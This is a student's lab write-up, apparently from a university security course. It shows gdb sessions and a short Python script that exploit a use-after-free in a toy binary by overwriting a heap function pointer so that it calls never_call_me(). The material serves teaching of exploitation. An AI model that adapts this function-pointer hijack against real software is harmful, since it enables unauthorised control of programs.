Step 1 - Build exploit:

dtrived5@smurf:~/CS-576-Fall-2020/lab08/exercise$ gdb uaf

(gdb) break main
Breakpoint 1 at 0x4006c2

(gdb) run AAAABB
Starting program: /home/dtrived5/CS-576-Fall-2020/lab08/exercise/uaf AAAABB

Breakpoint 1, 0x00000000004006c2 in main ()

Task 1: Find address of never_call_me()

(gdb) info functions
All defined functions:

0x00000000004005f6  never_call_me
0x0000000000400607  welcome
0x0000000000400618  echo
0x0000000000400645  icall
0x00000000004006be  main

Task 2: Find buffer size and return address

(gdb) si
0x00000000004006a4 in icall ()

(gdb) x/64xb $rax
0x602010:	0x41	0x41	0x41	0x41	0x42	0x42	0x0a	0x00
0x602018:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602020:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602028:	0x07	0x06	0x40	0x00	0x00	0x00	0x00	0x00

dtrived5@smurf:~/CS-576-Fall-2020/lab08/exercise$ cat exploit_base.py 
#!/usr/bin/env python3

import sys


oflow = b'A' * 24

exploit = bytearray(oflow)

# function address
func=0x4005f6

exploit.extend(func.to_bytes(8, byteorder='little'))
sys.stdout.buffer.write(exploit)

dtrived5@smurf:~/CS-576-Fall-2020/lab08/exercise$ python3 exploit_base.py > input

dtrived5@smurf:~/CS-576-Fall-2020/lab08/exercise$ cat input
AAAAAAAAAAAAAAAAAAAAAAAA?@

---

Step 2 - Run exploit:

dtrived5@smurf:~/CS-576-Fall-2020/lab08/exercise$ gdb uaf

(gdb) break main
Breakpoint 1 at 0x4006c2

(gdb) run AAAA < input
Starting program: /home/dtrived5/CS-576-Fall-2020/lab08/exercise/uaf AAAA < input

Breakpoint 1, 0x00000000004006c2 in main ()

(gdb) c
Continuing.

Breakpoint 3, 0x0000000000400696 in icall ()

(gdb) x/64bx $rax
0x602010:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602018:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602020:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602028:	0x07	0x06	0x40	0x00	0x00	0x00	0x00	0x00
0x602030:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602038:	0xd1	0x0f	0x02	0x00	0x00	0x00	0x00	0x00
0x602040:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602048:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00

(gdb) si
0x00000000004006a4 in icall ()

(gdb) x/64bx $rax
0x602010:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0x602018:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0x602020:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0x602028:	0xf6	0x05	0x40	0x00	0x00	0x00	0x00	0x00
0x602030:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602038:	0xd1	0x0f	0x02	0x00	0x00	0x00	0x00	0x00
0x602040:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602048:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00

(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAA?@

Breakpoint 6, 0x00000000004006ac in icall ()

(gdb) x/64bx $rax
0x602010:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0x602018:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0x602020:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0x602028:	0xf6	0x05	0x40	0x00	0x00	0x00	0x00	0x00
0x602030:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x602038:	0x11	0x04	0x00	0x00	0x00	0x00	0x00	0x00
0x602040:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0x602048:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41

(gdb) si
0x00000000004005f6 in never_call_me ()

(gdb) c
Continuing.
You shouldn't be here!
[Inferior 1 (process 10439) exited normally]
